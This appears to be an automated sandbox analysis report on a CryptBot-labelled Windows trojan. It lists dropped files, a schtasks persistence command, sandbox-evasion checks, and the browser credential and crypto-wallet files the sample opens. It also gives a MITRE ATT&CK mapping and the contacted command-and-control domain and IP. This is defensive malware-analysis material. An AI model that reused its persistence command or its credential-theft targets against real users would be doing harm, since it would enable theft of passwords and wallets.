Source: file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ZBldshzBAkDNcchezeGR.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: file.exe, file.exe, 00000000.00000003.2513275016.000000006A367000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: https://keruzam.com/update.php?compName=
Source: file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1923962283.000000000232E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C309C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_6C309C22

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C309C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_6C309C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C309D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_6C309D11

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C309E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_6C309E27

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\file.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00C151B0	5_2_00C151B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00C13E20	5_2_00C13E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C332CCE	5_2_6C332CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2FCD00	5_2_6C2FCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2FEE50	5_2_6C2FEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C300FC0	5_2_6C300FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C340AC0	5_2_6C340AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3044F0	5_2_6C3044F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3346E0	5_2_6C3346E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3307D0	5_2_6C3307D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3287C0	5_2_6C3287C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C340060	5_2_6C340060
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C332090	5_2_6C332090
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C322360	5_2_6C322360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C34DC70	5_2_6C34DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C305880	5_2_6C305880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3298F0	5_2_6C3298F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C337A20	5_2_6C337A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C33DBEE	5_2_6C33DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C33140E	5_2_6C33140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C341510	5_2_6C341510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C33F610	5_2_6C33F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C31F760	5_2_6C31F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2F3000	5_2_6C2F3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3B50D0	5_2_6C3B50D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3070C0	5_2_6C3070C0

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3BADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3C36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3C3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3C5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3C3560 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3C5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3C3B20 appears 38 times

Source: file.exe, 00000000.00000002.2514835607.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameschtasks.exe.muij% vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\kYSzIbkRGd

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\goCozsdHEgGOgPuuHxuy
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: zbldshzbakdncchezegr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: zbldshzbakdncchezegr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: zbldshzbakdncchezegr.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 6664192 > 1048576

Source: file.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4d2200
Source: file.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x10aa00

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_00C18230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_00C18230

Source: file.exe	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram
Source: ZBldshzBAkDNcchezeGR.dll.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00C1A499 push es; iretd	5_2_00C1A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3A0C30 push eax; mov dword ptr [esp], edi	5_2_6C3A0DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C36ED10 push eax; mov dword ptr [esp], ebx	5_2_6C36EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C344E31 push eax; mov dword ptr [esp], ebx	5_2_6C344E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C338E7A push edx; mov dword ptr [esp], ebx	5_2_6C338E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C33A947 push eax; mov dword ptr [esp], ebx	5_2_6C33A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C36EAB0 push eax; mov dword ptr [esp], ebx	5_2_6C36EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C358AA0 push eax; mov dword ptr [esp], ebx	5_2_6C35909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C340AA2 push eax; mov dword ptr [esp], ebx	5_2_6C340AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C342AAC push edx; mov dword ptr [esp], ebx	5_2_6C342AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C372BF0 push eax; mov dword ptr [esp], ebx	5_2_6C372F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C372BF0 push edx; mov dword ptr [esp], ebx	5_2_6C372F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C338435 push edx; mov dword ptr [esp], ebx	5_2_6C338449
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C358460 push eax; mov dword ptr [esp], ebx	5_2_6C358A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C33048B push eax; mov dword ptr [esp], ebx	5_2_6C3304A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3304E0 push eax; mov dword ptr [esp], ebx	5_2_6C3306DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C311CFA push eax; mov dword ptr [esp], ebx	5_2_6C3C6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C311CFA push eax; mov dword ptr [esp], ebx	5_2_6C3C6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C33A5A7 push eax; mov dword ptr [esp], ebx	5_2_6C33A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C372620 push eax; mov dword ptr [esp], ebx	5_2_6C372954
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C372620 push edx; mov dword ptr [esp], ebx	5_2_6C372973
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3806B0 push eax; mov dword ptr [esp], ebx	5_2_6C380A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3306A2 push eax; mov dword ptr [esp], ebx	5_2_6C3306DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3306A6 push eax; mov dword ptr [esp], ebx	5_2_6C3306DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3486A1 push 890005EAh; ret	5_2_6C3486A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3366F3 push edx; mov dword ptr [esp], ebx	5_2_6C336707
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3306FD push eax; mov dword ptr [esp], ebx	5_2_6C3306DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C33070E push eax; mov dword ptr [esp], ebx	5_2_6C3306DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C33A777 push eax; mov dword ptr [esp], ebx	5_2_6C33A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C340042 push eax; mov dword ptr [esp], ebx	5_2_6C340056
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C30E0D0 push eax; mov dword ptr [esp], ebx	5_2_6C3C6AF6

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\ZBldshzBAkDNcchezeGR.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_5-158248

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_5-158249

Source: C:\Users\user\Desktop\file.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 390

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.2 %

Source: C:\Users\user\Desktop\file.exe TID: 7476	Thread sleep time: -160000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8168	Thread sleep count: 390 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8168	Thread sleep time: -39000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: file.exe	Binary or memory string: VMware
Source: file.exe, 00000000.00000002.2514835607.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2514835607.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2514835607.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWq@ZO

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_00C18230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_00C18230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00C1116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	5_2_00C1116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00C111A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_00C111A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00C11160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_00C11160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00C113C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	5_2_00C113C9

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C3784D0 cpuid

5_2_6C3784D0

Source: C:\Users\user\Desktop\file.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 5.2.service123.exe.6c2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2493917636.0000000001B68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 8164, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: Electrum
Source: file.exe	String found in binary or memory: \ElectronCash\wallets
Source: file.exe	String found in binary or memory: com.liberty.jaxx
Source: file.exe	String found in binary or memory: \Exodus\backup
Source: file.exe	String found in binary or memory: exodus
Source: file.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	3 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	42%	ReversingLabs	Win32.Trojan.CryptBot

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://gcc.gnu.org/bugs/):	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
7sb.top	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sevtbb17sb.top	193.46.218.44	true	true		unknown

Contacted URLs

